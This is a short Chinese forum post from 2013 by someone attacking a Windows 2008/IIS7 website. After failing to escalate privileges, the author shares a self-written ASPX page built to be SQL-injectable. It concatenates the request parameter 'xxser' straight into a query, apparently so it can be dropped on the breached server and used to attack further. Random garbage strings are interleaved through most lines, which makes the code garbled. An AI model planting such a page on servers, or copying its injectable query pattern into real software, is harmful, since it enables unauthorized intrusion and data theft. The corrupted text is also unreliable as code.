昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
" O* ?* B4 I$ c- `# R3 m$ w其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。9 b) y: c! F% o6 z X6 p T n2 d
代码量不多,自己写个拉倒了。烦死了。5 l0 d/ }; w, b: T; s6 e
+ B) v$ l. B4 ] m
# O/ f! V9 e% n) l* V; O+ F3 P- u<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
; m% h! b; }$ g+ R/ I4 t6 S/ w<html xmlns="http://www.w3.org/1999/xhtml">3 x9 V" }" S/ E
<head runat="server">
6 k' x- c$ I# C: a* x <title>暗影aspx构造注射专用页面</title>
7 N" F( D% A# n- P8 |( q! K</head>
( |! H5 g0 C. t/ ~<body>
, P: o; e b. m. T% m; r <form id="form1" runat="server">/ ?4 z5 B p! `3 O) q
<div>2 s4 J9 q q) g' j5 W$ l
<script language="c#" runat="server">
3 K; j5 K' |# | 9 y" s# F: c+ W$ O' O$ f0 H$ n X' {
void page_init(object sender, EventArgs e)
3 m1 x; X) H4 J# d! p" x {
}- Y" [1 n) S# p; o
8 w9 l! g- g. ~ System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();0 d0 L8 R/ R4 P) l2 R" H C) G) N
: _6 _- Y5 @4 T# D2 O6 } conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();1 S, s' K0 K: ?& H2 B
conn.Open();) l' ~! Q( Q3 y3 f( k4 o
) |( ]' ?. Q' B4 t( M string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
' S8 v0 R) |3 g1 l
4 Q' `# o, q0 O System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
W& [- K; `. D' D6 I int x = command.ExecuteNonQuery();
8 s4 N; ~& G* s& H/ G Response.Write(i+"\n");8 r; b$ `# {7 t2 S% a. F' Q" _
Response.Write(x);
J+ l/ e2 k" _% G& i* h# ?+ n conn.Close();% N9 S" h& d) a. I
}' N0 U: e% H7 R3 v, `7 T/ T
+ o- v- f; j9 c) |. E4 f/ ]: u </script>+ y7 b1 h# c* ?
</div>
! D. U: n: L; V/ Y- _; u </form>
- M1 ^/ Q( f& N</body>
8 a) X! x& f! H& p0 C</html>1 ]/ [) \8 n: {: s# r. {3 v
|
发表于 2013-3-20 21:32:01
收藏
支持
反对